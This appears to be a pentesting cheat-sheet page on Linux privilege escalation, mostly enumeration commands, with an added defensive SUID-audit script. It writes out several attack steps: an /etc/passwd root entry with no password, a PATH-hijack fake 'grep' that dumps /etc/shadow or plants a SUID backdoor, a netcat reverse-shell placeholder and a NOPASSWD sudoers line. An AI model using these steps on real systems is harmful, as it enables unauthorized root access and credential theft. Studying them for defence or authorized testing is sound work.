šŸ©
HackBook.io
Pentesting Pocket Book for hackers and developers.
Linux Escalation


Last updated 2 years ago


The Single Best Resource:

Shell Change:

Some shells have vulnerabilities that others do not. The default bash program has far fewer vulns than shells like zsh. We can copy shells to directories that we have root privs on and then chmod 4755 the new program. When we launch this local program we will then have root privs. We can also change the symbolic links for shells to point at a shell program that we want to run.

// changing the symbolic link
// this one has us doing it as root though and is from my sec class
// might be unreliable since we don't have root
$ su
Password: (enter root password)
# cd /bin
# rm sh
# ln -s zsh sh

SUDO as another User

(we had sudo rights for a file owned by user 1000):

$ sudo -u#1000 ./file.sh

Write to PASSWD:

# echo root::0:0:root:/root:/bin/bash >> /etc/passwd
# su
# openssl passwd mypassword
// will output a hashed password like ASWsdfhjL56. Then we add that between the colons and save; then we can either su to root or ssh in as root.

Add user and mod group:

# cd /home && ls

We got denied the file read, so we decide to try adding a user with the same UID of 1014.

# sudo adduser pwn
// we automatically got assigned UID 1001, so we will need to change it to 1014 to read the file.
# sudo sed -i -e 's/1001/1014/g' /etc/passwd
// -i edits the file in place, -e supplies the sed expression (script) to run
check with:
# cat /etc/passwd | grep pwn
# su pwn
# id

OS info:

# cat /etc/issue
# cat /etc/*-release

List processes:

# ps axu

Network info:

# ip a
# /sbin/route
# ss -anp

Firewall:

- Check /etc/iptables
- We can also search for files created by the iptables-save command, which is used to dump the firewall configuration to a file specified by the user. This file is then usually used as input for the iptables-restore command to restore the firewall rules at boot time. If a system administrator has ever run this command, we can search the configuration directory (/etc) or grep the file system for iptables commands to locate the file.

Scheduled tasks:

# ls -lah /etc/cron*
# cat /etc/crontab
// search for cron jobs writable by all users
# find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

Installed apps and patch levels:

# dpkg -l (Debian-based) or # rpm -qa (RPM-based)

Read/Write files:

# find / -writable -type d 2>/dev/null

mounted disk:

# cat /etc/fstab
and
# mount
all available disks:
# /bin/lsblk

Kernel modules (drivers):

# lsmod
# /sbin/modinfo <module to look at>

Looking for SUID files:

# find / -perm -u=s -type f 2>/dev/null
or
# find / -perm /4000 2>/dev/null
// Now get a list of all the default SUID files for that operating system and compare, to see which are not default installations and are likely user added.

Run the SUID binary (in this case bash) keeping the SUID bit:
# ./bash -p
// if you ever need to launch a shell file with SUID, make sure to try /bin/dash, since dash won't drop the SUID bit the way bash will.

Show library calls of SUID files:
// shows the library calls being made by a program. This is good to see how program command arguments are being used, in order to abuse them.
# ltrace /usr/bin/checkHost 8.8.8.8
// there is also strace, which will show system calls, but this will flood you with too much information.
In this example we saw it was running the command "ping 8.8.8.8 |grep tra"
// since grep is not path specified ("/bin/grep") we can make our own grep command and force its use with the SUID bit. This first file method is best because it will give you passwords and not just root.

---- file named grep ----
#!/bin/dash
cat /etc/shadow
-------------------------
-- or auto-root --
#!/bin/dash
cp /bin/dash backdoor
chown root:root backdoor
chmod u+s backdoor
-------------------------
-- or reverse shell --
#!/bin/dash
nc shell here
-------------------------

# chmod 755 grep
# export PATH=.:$PATH
// tells the OS to check our current directory for binary programs before looking at /bin
// so now if we run the program it will give us a root shell
# checkHost 8.8.8.8
// returns the shadow file to then use JTR on
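The comparison against a known-good SUID list that the text describes, as an added audit script (not from the original page): it lists set-UID files under a directory and prints the ones missing from a baseline file. The directory tree, file names and baseline are constructed for the demo and are assumptions.

```shell
#!/bin/sh
# Added audit example (not from the original page): list set-UID files under
# a root directory and report those missing from a known-good baseline, so
# user-added SUID binaries stand out. Paths and the baseline are constructed.

# Print set-UID regular files under $1, one per line, sorted for comm(1).
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print paths that are set-UID under $1 but absent from baseline file $2
# (one path per line). comm -23 keeps lines only present in the first input.
suid_not_in_baseline() {
    current=$(mktemp)
    find_suid "$1" > "$current"
    sort -u "$2" | comm -23 "$current" -
    rm -f "$current"
}

# Demo on a constructed scratch tree: runs offline as an unprivileged user,
# since a file's owner may set the SUID bit on it. Prints the unexpected path.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/opt"
    printf '#!/bin/sh\necho expected\n' > "$tmp/bin/expected"
    printf '#!/bin/sh\necho surprise\n' > "$tmp/opt/surprise"
    chmod 4755 "$tmp/bin/expected" "$tmp/opt/surprise"      # both set-UID now
    printf '%s\n' "$tmp/bin/expected" > "$tmp/baseline.txt"  # only one expected
    suid_not_in_baseline "$tmp" "$tmp/baseline.txt"
    rm -rf "$tmp"
}

demo
```

On a real host, build the baseline from a clean install of the same distribution and run `suid_not_in_baseline / baseline.txt`; anything printed deserves a look.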

history

Environment variables for history:
$HISTSIZE     // number of commands stored in history for the current user and session
$HISTFILESIZE // how many commands are stored in the history file
Config file where these settings are saved: .bashrc

Run a command from history:
# history
pick the number, then:
# !3
rerun the last command with:
# !!
Search command history: ctrl-r, then start typing the command name

fc: With 'fc' we can list command-line history and also edit previous commands in a vi-like experience to then re-execute them. This is local to the shell and not built into the OS.
List commands:
# fc -l   // we can append numbers to the end to select ranges or specific commands

Cron Job check

Monitor processes to check for running cron jobs.

#!/bin/bash
# Loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    # print only lines that appeared or disappeared between the two snapshots
    diff <(echo "$old_process") <(echo "$new_process") | grep "[<>]"
    sleep 1
    old_process=$new_process
done

Add shadow file

add yourself to the file:

# echo -e "\nwww-data ALL=(ALL) NOPASSWD: ALL"   // sudoers rule syntax

echo -e "\njeremy ALL=(ALL) NOPASSWD: ALL"

Processes

Process Spying:

pspy, located in /opt/pspy/

check the vuln box attributes:

# uname -a

on the attacker machine, build the tool (in the pspy dir):

# GOOS=linux GOARCH=amd64 go build

Basic Linux Privilege Escalation - g0tmi1k